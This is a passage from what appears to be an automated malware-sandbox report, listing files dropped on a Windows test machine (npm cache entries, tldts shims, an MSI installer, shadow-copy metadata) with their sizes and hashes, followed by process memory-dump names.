1de0cc5ced2fa64a8b3fe8fdc12f64fc7b97a59e1ad2f3611a3b413eaa2da777

SHA512
bf9cc6b11f9b03897516dd81fa66d5af4d820e8fad1a335c368ecc248ce59420b1df31c3170d3149060519bf0b9c98e82184974f0ecfdc04ca2a0a4d33cd6d47

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\c1\d3\d6d16b3e7aa7edfdb1c5fe8ef0f9933ff289b5ae0026745e58f8b9d16511

Filesize
696B

MD5
9e5228b03620aa75a6c6816e929c98d3

SHA1
1acf0713dd02945bb1c7fbcbf6ec4e78f286d048

SHA256
7acdb5e07226839a9a4343dc32417fda79574819e01a3138364f28eb73979246

SHA512
120c0081a61c245d73c2bbf4bf33ec156d4f8ef799d69f2d02aa13745864f95b027448ff3851d4185762bef0c16d42a61219b1e380e12d34a0df4b2f53c86186

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\ce\f1\1c3e7727ce137b57fae686e62cb1d339503f85388f0df4877160c0d5c513

Filesize
693B

MD5
772b93508ab6a2759e1631c1f5ec4fdb

SHA1
07cc92741d83885ce4e2ffb05a339e178a7fe8ee

SHA256
de22073c5087a957ffc22d1561387cd3a613faccd41cb3d9cd578237ba1f6877

SHA512
942443bbe7db5a1d1f667bfbf941380a5a9fdafba6b6831face7374cd7576d076b3c72eb47198ed94888ff5840ebdc4cd5a164b6c0a17a7ab0f113849b8eaf3d

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\d5\1d\5fee4efb5381a2f44660e477c3527f321b26e8374e7df4036318fb933be2

Filesize
698B

MD5
7101d4689ce749ed468583bf57910b67

SHA1
993c5231bd60b0519ca841ccfbf7c5bcf53d3324

SHA256
7d4ee6084dc14cd59a722bee100f8caec8d3c8261465ab0bc177db6a7bf15d4e

SHA512
2eb94a1e09b8a66419a60c2c2e848bf01e6fbf30d72974d8880ba871d80f5eba8c66d758acc0c8b91fa50e924e27765450a5d1e65d076c12946edb26ec6bbe39

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\dc\8a\4dc2a1bdf5b195e99648a945ce742de5f6d0b1aac410a6fe3e7155933cc7

Filesize
698B

MD5
9ae3cc32959783dec9c42332f76f7453

SHA1
8ac454f8d0a2163a1f9204bbfe9eedf229cc2021

SHA256
99b0d7f81ee59babf98cb93f6430bcb896cb311c26758fbc20a54fd8434d9df1

SHA512
5b35144fc5eef2e0763b1e2c7d35efcda89328cb6b785231e34d6a3998a79d22672314982b194b245b743e98cbf616b860aee2911ff3133619aebc0f9dcce629

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\de\65\e2aa018ddf50fda255d93a8765f0d980e29131c129ee4b7810ed4ff0a76d

Filesize
719B

MD5
d9349fa764266b3e5bac8cd130792a22

SHA1
cef0025a124951dedf7d8237f79d45f62da77754

SHA256
ce7973846c41ad67f19aeb4b79a15ce18a6b54094aabcf0f0e445a15cc335d70

SHA512
f5c89621c348bf9519863ba0bcbb1cd25812dc6b04fc362aa40fbfd14000833575b784d2b5f14e4507947a808fc223dce3617b994ed321200d08ced1022e4d10

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\e0\3b\55e56e6f53ffe7a3aa682cb279b0f1f907be037ece0730687bb49a730313

Filesize
702B

MD5
bf885ba42b928f4f08836ac2603c1558

SHA1
11a52894ff19978af9c2f2ed13a1f9d75a94b20b

SHA256
d16b0bc0db07e6cfcfaf1ee4b2349b837a9f54bdbdbd1173c879e3f8e8209a06

SHA512
9546e73d1bceca86829b7a95921d18bd2098e0e0b3724df50212330046fd9c6a9edf479bcca8dcf1f254d154828f84285ba8c0bb5ac8a1b771e7dffd206420cf

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\ec\32\34963a2d5c9f0f5675f22c2fd4c291ce5717f8a67af64d21baa901f88e26

Filesize
699B

MD5
9cb5002d400bd232db0268ec0682b0eb

SHA1
fe67e2d756132b1090a433824b960e23f31a2c59

SHA256
6635cab6c948d0847de6039673991c5d82e5100ba776f27625bcec73b28f3a6b

SHA512
a92aa2155412fb522932a2b09affe663760267ea6411c7400f52b6fc1a616e40cd4e695f5ef7a633834f8aa8f63a90f936e13f4620ba763953eb2c791c0d3fbd

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\ee\27\e644022ca48d0014ecc6be9026f03fae2451103bd1e4432f1614b9aa9b99

Filesize
702B

MD5
a789012b3ae561854f835f702849625a

SHA1
f3808540d698a0b14bcc95b8ceaac16ff1dcac3c

SHA256
90cac20266bfe102a0e58c1f9f558cf403a3b669c19c184448b08292242ba397

SHA512
8b61f0d8690fe29ab193ae7d4134caa2a33c12e203c2af91306a66a34267eaee477aaeb29900aa0f51b093599f549e250ecdfc147fb91a5ef0314c856a0cad5d

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\f3\2c\80267cf9b394a43404ccabe3e574f5fd89b769b43be625b75ff9b1b4a2ee

Filesize
692B

MD5
dc48f532623b5600c52b9a910edefef8

SHA1
e38ecebe351ace5a4d4eb4c1f86034e47dc84f16

SHA256
d4563b40a01fc16798dccfb22b288955aedece8c5c18758c97b93b3545186470

SHA512
94f053259d166e10bc180f7c4a981a573967a2409f40ed0481d6622f17be000d449afda25ff9a9f0dee7d1b18fb93bc18febc7f23619fcbcdda62b87597f47ae

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\index-v5\fb\82\61c011bcd7a4a2513c992da10ab3fd1d3a929ae8bfceed0be0a44fd967f7

Filesize
740B

MD5
02ad75abe8ec7dabc333cfca571bad38

SHA1
e79f1021e62a8eb0f1714fed4f908b00be40aeb9

SHA256
142794e80a3bc0380fa967f7056a267b09a9236ae531bb571016a934ad6e7544

SHA512
84589fbf9d36e635e20a9c5921ec1177ac43ddd3ee46f22667becf0f05813970b49fd62b16ddcf6b99811aa371e857d05f59384c01eaba9d7210ef6640212534

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\01feb299

Filesize
698B

MD5
5f258715fb5fa061f5eb1f9edb9a19db

SHA1
6ed8818f02034c8592a2ac0af82e5583f76cf524

SHA256
3a9e16f414b5c20b174c614a4e49be76e9a208b13641858b2b97ee5495deb757

SHA512
1ad2cdc5bba71d3431f3ddefd4f838d3e23c31eb7191cbca7e31ecb164b1344b15d41d4e94e872ea0d4d22c8b23969610da8b1b61aa52e79320e30e15d23a854

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\2fb9dd1e

Filesize
713B

MD5
86344add9fd8a7cc728f776f564b3f1c

SHA1
8c90677976e1451c500a034b22df463cf3f12c59

SHA256
8024b1eb7a9239677f85ea0082cfc5068e2b041397eb740803f7cef7a7630d39

SHA512
d894661027ffcd9985f5bb64d2ea8ebcf0e5af1a2974822d740a2d49c59d9e5cddef4c3b1362ca955b9eb30557d59abd272ecb68af23b629e55e819e91ee65b6

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\30e9a704

Filesize
186KB

MD5
c8e431e26a65aef5f4734a8f586a9a6e

SHA1
a59aba0883c3f5b1d57584e2bcebd84ecd3ceb28

SHA256
ed4bd4034681bfb9cd08bfbfb93556a39e459c761adbbd72b2067329a35eb395

SHA512
29416a63d06f2b29a11e6fdbbdfe7e62b0e02d2fcdf91776781c17dae6e0f7f6d813726195e8ccdbf41a2db5550e74b48a69c5389884806341d00b67adeea8ca

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\38a0d2c3

Filesize
687B

MD5
e5c7b4d5bf3c380b927a06bf35f3612a

SHA1
860407100c7efdc3c24851bd40b4df4ab582e6c4

SHA256
be6bbb515b02b9c45d6608f510c682239a35dc3a45bd018a281be6d6b5262fee

SHA512
a668c0181e2e962bfc69f59ac9f7107739575b3eea1a32c5eb447efb18bba65d742e321081a1bbcc28d6fe32447fbbbb981444f0e6f034e0578c995359d482e7

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\8282e99b

Filesize
117KB

MD5
f02c8f1593eba61ef0e3fb9b5f6282eb

SHA1
5cef0275d738b434920f2105cb6e448f5b4e1af3

SHA256
fe6f28f4abf3ef6516622a98ce9f802e8ca5c55647a7b46df49766284b9609f4

SHA512
2c719dafddcfc8bb060d686b050eaf92ef9e2207b04c4bc4d19ca8672f4d6d8058f5bcdf08975260ac64b990bd5a20d69420f411ed7fc74ff8fcced5c3fa4cdd

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\9577fb74

Filesize
688B

MD5
3c9aef062ec6e54bd7f7b39c786a83db

SHA1
ebe069fed338ae78192291b55535f2737f1fb85a

SHA256
24e2f2301e012e37c32bc84aa0f027f7a1d7ec87467c7606bf1c8ec521f945fa

SHA512
4ef311ef36e6d3237487768697819fabf6f3daa5ece022ad83533e8d997f05dae9b0d5b130fc7af9e44f8be107d2ce1dcdb7b5cb0a8482e0bb810618502cf06f

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\a29df7ff

Filesize
697B

MD5
deb96ee0ec65de6d26d1107c1fa776ca

SHA1
194c3ed17974d9451a4707171b29bfaf52691b35

SHA256
d51a5431b739174d5b7c833be0e2138ce526968d9c44505ef17aa153ff4beb69

SHA512
55ea3a5f0a319b8fcc3bfff07ab25133db08a33eba5da27ee55b21d4f4a85a3546322258213445acd209e0ad4dff9d832602fef63f9f7b8416f23bbc69ece827

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\a314bbaa

Filesize
688B

MD5
13c1cc7e260022b23648b1c1474fae3f

SHA1
f006868517b62a211aea6c5e2f1bba09fae40a39

SHA256
3d8aedb7f5be108911d0165d12ddf07a5ab895716096e22f1550147603346635

SHA512
51e5c30e4b8d45b65246b43dcc51db6c50bc659adbc6f4ad75bfb35818a1d7cf4664035766726a3e52100fe433b52e2e384ef1a0f0d37c057be351ee520ee32f

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\befdcb42

Filesize
7KB

MD5
3bcba958c6b6f93281ecae10d9487373

SHA1
d8215f38b885ddd8635c0ea338210f068e4781ee

SHA256
3936cd62847ce2f4e3cc2ab3633de5d02f02fbcf204fd52c03bd7ee7db55e169

SHA512
febf37c6c84f2c2c3138c50cc21580fffef19f2fe554145712c8f5f8a02827c48268a23fbeeebc48224571c46505484e0ae44924f614d416d691ba1004feb007

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\cab0db5c

Filesize
685B

MD5
caa8d37ff33cc06830d2f99191866b1b

SHA1
1ecaf4dbb6b79bfbfc141b8e1e504a1c31a37661

SHA256
34005eedd411b5ab0f1d7dd888dd96c8842f9d722ca4a8caccbd02e6dd71de10

SHA512
fab56ced72fd349df143cb9a526a5043b81cb035c9561390fd9ba5989da07048a7989de62bd57da95c8af4eb340d508addf6feef347bea22be8cbb1eab45d25a

Download Submit
C:\Users\Admin\AppData\Local\npm-cache\_cacache\tmp\dbd240aa

Filesize
61KB

MD5
82e6f5d5ce9f6072bf68b256d591795b

SHA1
2ca5352e454b8974eb2a82ad3dc40621ed5a785d

SHA256
b058176489bd33764b219facac41e2bab1d805bcdbceb3de05cbad978f6ebe2f

SHA512
fe53599dfc5cf1869360b409b6575e439fa365a948ff098f8c04497f88cbc89a0aecd4b8dfb004418bff6cc56a0ef06feb99e0d093445972f7ce3ba53a267597

Download Submit
C:\Users\Admin\Pictures\node_modules\.bin\tldts

Filesize
381B

MD5
cf4ea5bd34d844e40a32e70d1380d81e

SHA1
656a667cc03943cf4ad1ab5cff249e90e0eb5e47

SHA256
acb576d0cdbcd419cb2078cb63eab1ad40800094a5cca504c7e79a0530c45580

SHA512
c8db2f5b2cb90766c2852b8bfac6cc5d7a32d5dccf6ebbde6d20aeb68d3d59f7765fc8f04d7f66cb557b60aa250e68a3d79e541d07cdb499a9ac00a0e65d1265

Download Submit
C:\Users\Admin\Pictures\node_modules\.bin\tldts.cmd

Filesize
321B

MD5
14330ca5c2f8d66e17a3f2e4c9db3b6b

SHA1
eba0851d3e9b61215a2f99c1ba76113e458d7b2c

SHA256
d82bf9733d3016c8f72fb964140406fedc725bb1273e8ee7aa808f15f4db146b

SHA512
e10523f1b626f5cb7c88de22529bbaad642472d7ed493e039e0e1c3fed6a4525615408dbd1c1b4663fce72d371e807b8fb6063addc195d2c71e78cb5341fb530

Download Submit
C:\Users\Admin\Pictures\node_modules\.bin\tldts.ps1

Filesize
789B

MD5
79ae3a8b1bec26f55c7b1ed64c447dae

SHA1
0d45f25a0d3cf8db1e0f9675ad5b482cb9c07508

SHA256
6043827739a3a12198407c11a9ca42333c060be89d22373d0c1781802f9e09b8

SHA512
678f41e97bb8848765409734fb7b403d35696b11a34805cdba4c9d77fe45b78cb4de22d237d46af892c3c62117f0f1c3b24cc48be6815d573a39f9e3a359ce6e

Download Submit
C:\Windows\Installer\MSIFB1E.tmp

Filesize
341KB

MD5
74528af81c94087506cebcf38eeab4bc

SHA1
20c0ddfa620f9778e9053bd721d8f51c330b5202

SHA256
2650b77afbbc1faacc91e20a08a89fc2756b9db702a8689d3cc92aa163919b34

SHA512
9ce76594f64ea5969fff3becf3ca239b41fc6295bb3abf8e95f04f4209bb5ccddd09c76f69e1d3986a9fe16b4f0628e4a5c51e2d2edf3c60205758c40da04dae

Download Submit
C:\Windows\Installer\e57d35d.msi

Filesize
28.9MB

MD5
fa9e1f3064a66913362e9bff7097cef5

SHA1
b34f1f9a9f6242c54486a4bc453a9336840b4425

SHA256
9eea480bd30c98ae11a97cb89a9278235cbbbd03c171ee5e5198bd86b7965b4b

SHA512
ad3e9469326dccac6b49185b5b2814ba700b5d83b4b3ce17f85a9adc5f90bdebf54d79800b253ed5c371ab82d27304841f86ab1a8a3c7ffade8a2d78e55dc99f

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
24.6MB

MD5
2a31174ba78159107e4a24632af62382

SHA1
dd56db08fb0b9acd143c9f097d52110b5f036831

SHA256
9ddb66ece1a6843afeccf1b8c6560b0482f50158b587fc9657985b1a1d1782a3

SHA512
2f9c3015408be1c107b5537d44855078e0d108501392d04ff08faa8f18114506a0ed03692d40e0d9c628c349bc7ca276fc773bf8966fc0829952bebc3de71b89

Download Submit
\??\Volume{4627e397-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{20f4e584-b454-40a8-8b09-4a164f353d19}_OnDiskSnapshotProp

Filesize
6KB

MD5
b2572e4cabe1f8d195e39bbf8d29336b

SHA1
1db441e6280218fdd01561fae0a5de49a7daf1aa

SHA256
1cbba4510cfd36516d653fff10ce09dcd315813a903e6f818817b2eb45b0edc6

SHA512
a45ba8c0fb30858146d96dca9d8eb4aca24c6d25d02449c768ab414dceced22c4edf8178bd0d1015cb21f591c61e411a9dfe2ca91a5c0abc1d098e3c029525be

Download Submit
memory/1416-2758-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2765-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2764-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2766-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2760-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2767-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2768-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2770-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2759-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1416-2769-0x0000024A88A60000-0x0000024A88A61000-memory.dmp

Filesize
4KB

Download
memory/1912-3203-0x0000000000200000-0x000000000022E000-memory.dmp

Filesize
184KB

Download
memory/5000-4303-0x00000000008F0000-0x00000000008FA000-memory.dmp

Filesize
40KB

Download
memory/5260-4337-0x0000019AF0510000-0x0000019AF0518000-memory.dmp

Filesize
32KB

Download
memory/5260-4341-0x0000019AF07B0000-0x0000019AF07DA000-memory.dmp

Filesize
168KB

Download
memory/5260-4342-0x0000019AF07B0000-0x0000019AF07D4000-memory.dmp

Filesize
144KB

Download
memory/5876-3744-0x000001F471BC0000-0x000001F471BC8000-memory.dmp

Filesize
32KB

Download
memory/5964-3178-0x0000020FA6230000-0x0000020FA6238000-memory.dmp

Filesize
32KB

Download
memory/5964-3177-0x0000020FA6210000-0x0000020FA621A000-memory.dmp

Filesize
40KB

Download
memory/5984-3189-0x00000251D3980000-0x00000251D3988000-memory.dmp

Filesize
32KB

Download
memory/5984-3165-0x00000251D3910000-0x00000251D3932000-memory.dmp

Filesize
136KB

Download